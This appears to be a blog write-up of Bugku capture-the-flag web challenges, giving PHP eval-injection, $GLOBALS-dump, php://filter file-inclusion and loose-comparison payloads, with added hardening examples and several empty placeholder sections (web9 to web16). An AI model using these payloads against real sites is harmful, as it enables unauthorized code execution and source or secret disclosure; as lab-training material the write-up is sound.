Bugku web guide
2022-07-06 09:52:00 【XRSec】
web
web1
https://segmentfault.com/a/1190000016750234
Knowledge base
Several functions are involved:
1. $_REQUEST: retrieves data submitted by both the POST and GET methods, but it is slower.
2. eval: evaluates a string as PHP code. The string must be valid PHP code and must end with a semicolon.
    <?php eval("echo'hello';echo' world';"); ?>
    # output: hello world
3. var_dump: outputs information about a variable.
    # number
    var_dump(1);
    > int(1)
    # string
    var_dump("string");
    > string(6) "string"
Solution approach
eval should be the way in for this challenge, because it can execute PHP code.
hello is the variable that receives the parameter. The next step is to construct the hello value so that it closes var_dump and then uses print_r for output.
First, close var_dump: 1);
Second, construct print_r: print_r(file("./flag.php"));
Final constructed URL:
http://123.206.87.240:8003/index.php?hello=1);print_r(file("./flag.php")
The constructed URL makes eval run:
eval('var_dump(1);print_r(file("./flag.php"));')
The contents of flag.php are output successfully.
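The splicing flaw described above, next to a form that needs no eval, as an added example that is not the challenge's source code. The template var_dump(<input>); is an assumption inferred from the payload, and the function names are hypothetical.

```php
<?php
// Added illustration (not the challenge's source). The template
// "var_dump(<input>);" is an assumption inferred from the payload above.

// Vulnerable pattern: request data becomes part of the PHP source text.
// The string is only built and inspected here, never passed to eval().
function build_eval_source(string $hello): string
{
    return "var_dump(" . $hello . ");";
}

// Count statement terminators with PHP's own tokenizer, so a ';' inside a
// string literal is not mistaken for a statement boundary.
function count_statements(string $source): int
{
    $count = 0;
    foreach (token_get_all('<?php ' . $source) as $token) {
        if ($token === ';') {
            $count++;
        }
    }
    return $count;
}

// Hardened pattern: the input is passed as a value, so it can never
// introduce a second statement.
function dump_value(string $hello): void
{
    var_dump($hello);
}

// Constructed inputs: a plain value and the value from the write-up's URL.
$samples = ['1', '1);print_r(file("./flag.php")'];

foreach ($samples as $hello) {
    $source = build_eval_source($hello);
    $statements = count_statements($source);
    printf("eval source : %s\n", $source);
    printf("statements  : %d%s\n", $statements,
        $statements > 1 ? '  <- input escaped the var_dump() call' : '');
    echo "hardened    : ";
    dump_value($hello);
    echo "\n";
}
```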
web2
This challenge is about brute-forcing the code.
web3
The problem lies in the source code.
Knowledge base
PHP automatic global variable $GLOBALS: references all variables available in the global scope. It is a global associative array containing all variables; the variable names are the keys of the array.
Solution approach
The regular expression "/^\w+$/" is matched against the string. \w matches letters, digits and underscore { a-z, A-Z, _, 0-9 }. If the string does not match, "args error!" is output.
The two / characters mark the beginning and end of the regular expression, ^ anchors the start, $ anchors the end, and + means one or more \w.
In PHP the value of one variable can be used as the name of another variable: $$args. Combine this with the first sentence, "flag In the variable!"
So construct the payload: URL?args=GLOBALS
This dumps every variable, including the flag.
web4
Knowledge base
By capturing the request and modifying the value of file, some files that should not be run can be run.
The same method can also output sensitive configuration files directly and remotely include a shell (the target host needs allow_url_fopen turned on).
Solution approach
Construct the following request:
http://xxx.com/index.php?file=php://filter/read=convert.base64-encode/resource=xxx.php
This returns the base64-encoded source of xxx.php. Decoding the base64 gives the code of xxx.php.
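A hardened way to handle the file parameter, with a classifier for logging rejected values, as an added example that is not the challenge's source code. The page names, paths and function names are constructed for the illustration.

```php
<?php
// Added illustration (not the challenge's source). Page names, paths and
// function names are constructed for the example.

// Vulnerable pattern the write-up relies on, shown as a comment only:
//     include $_GET['file'];
// Any stream wrapper or path PHP can open is accepted, which is why the
// php://filter/read=convert.base64-encode/resource=... value returns source.

// Hardened pattern: the request selects a key; the server owns the paths.
const PAGES = [
    'home'  => __DIR__ . '/pages/home.php',
    'about' => __DIR__ . '/pages/about.php',
];

// Returns the file to include, or null when the value is not a known key.
function resolve_page(string $file): ?string
{
    return array_key_exists($file, PAGES) ? PAGES[$file] : null;
}

// Labels a rejected value so the log shows what kind of probe it was.
function classify_rejected(string $file): string
{
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $file)) {
        return 'stream wrapper or URL scheme';
    }
    if (strpos($file, '..') !== false || strpos($file, "\0") !== false) {
        return 'path traversal or null byte';
    }
    if ($file !== '' && ($file[0] === '/' || $file[0] === '\\')) {
        return 'absolute path';
    }
    return 'unknown page name';
}

// Constructed request values; the second is the one from the write-up.
$samples = [
    'home',
    'php://filter/read=convert.base64-encode/resource=xxx.php',
    '../config.php',
    'contact',
];

foreach ($samples as $file) {
    $path = resolve_page($file);
    printf("%-58s %s\n", $file,
        $path !== null ? 'include ' . $path : 'rejected (' . classify_rejected($file) . ')');
}
```

Keeping allow_url_include off in php.ini is a separate layer; the allowlist is what stops local wrappers such as php://filter.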
web5
Knowledge base
Not difficult; reading the PHP is enough to understand the idea of the challenge.
    $what=$_GET['what'];
    echo $what;
    if($what=='flag')
    echo 'flag{****}';
http://xxx.com/?what=flag
web6
Knowledge base
    $what=$_POST['what'];
    echo $what;
    if($what=='flag')
    echo 'flag{****}';
The approach is obvious: this is a POST request.
web7
Knowledge base
> JavaScript is a scripting language for the web. It is widely used in web application development to add dynamic functions to web pages and give users a smoother, more attractive browsing experience. JavaScript scripts are usually embedded in HTML to do their work.
> jother is a different JavaScript tool.
> A pile of + and ! characters: just decode it with jother.
> Open Google Chrome and press F12.
> Then, in the console, paste that pile of text to be decoded and press Enter to decode it.
> Look at the source code more; I don't know what the hell this is.
Copy it to the console.
It shows "ctf{whatfk}".
Obtain the flag.
web8
Knowledge base
    $num=$_GET['num']; // get the parameter via GET
    if(!is_numeric($num)) // is_numeric() checks whether the value is a number or a numeric string
    {
    echo $num;
    if($num==1) // the contradiction: it must equal 1 and yet not be a number
    echo 'flag{**********}';
    }
Solution approach
Construct num=1X, where X can be any letter or string. Construct the URL: http://xxx.com/get/index1.php?num=1xx
Obtain the flag.
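The challenge's two checks side by side with a strict check, run over several edge-case inputs, as an added example that is not the challenge's source code. The function names and sample inputs are constructed for the illustration.

```php
<?php
// Added illustration (not the challenge's source). Function names and the
// sample inputs are constructed for the example.

// Same two conditions as the challenge: "not numeric" AND "loosely equal
// to 1". Before PHP 8, == converts a leading-numeric string such as "1xx"
// to the integer 1. PHP 8 compares a non-numeric string with an int as
// strings, so on PHP 8 this branch is no longer reachable with "1xx".
function challenge_check(string $num): bool
{
    return !is_numeric($num) && $num == 1;
}

// Hardened check: accept digits only, then compare with ===, which never
// converts types.
function strict_check(string $num): bool
{
    return ctype_digit($num) && (int) $num === 1;
}

// Constructed inputs covering the cases where the checks disagree.
$samples = ['1', '1xx', '1 ', '1e0', '01', 'abc'];

printf("PHP %s\n", PHP_VERSION);
printf("%-8s %-12s %-12s %-16s %s\n",
    'input', 'is_numeric', 'loose == 1', 'challenge_check', 'strict_check');

foreach ($samples as $num) {
    printf("%-8s %-12s %-12s %-16s %s\n",
        var_export($num, true),
        var_export(is_numeric($num), true),
        var_export($num == 1, true),
        var_export(challenge_check($num), true),
        var_export(strict_check($num), true));
}
```

Running it under PHP 7 and PHP 8 shows the loose-comparison column changing for "1xx" while the strict column stays the same.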
web9
Knowledge base
1
Solution approach
1
web10
Knowledge base
1
Solution approach
1
web11
Knowledge base
1
Solution approach
1
web12
Knowledge base
1
Solution approach
1
web13
Knowledge base
1
Solution approach
1
web14
Knowledge base
1
Solution approach
1
web15
Knowledge base
1
Solution approach
1
web16
Knowledge base
1
Solution approach
1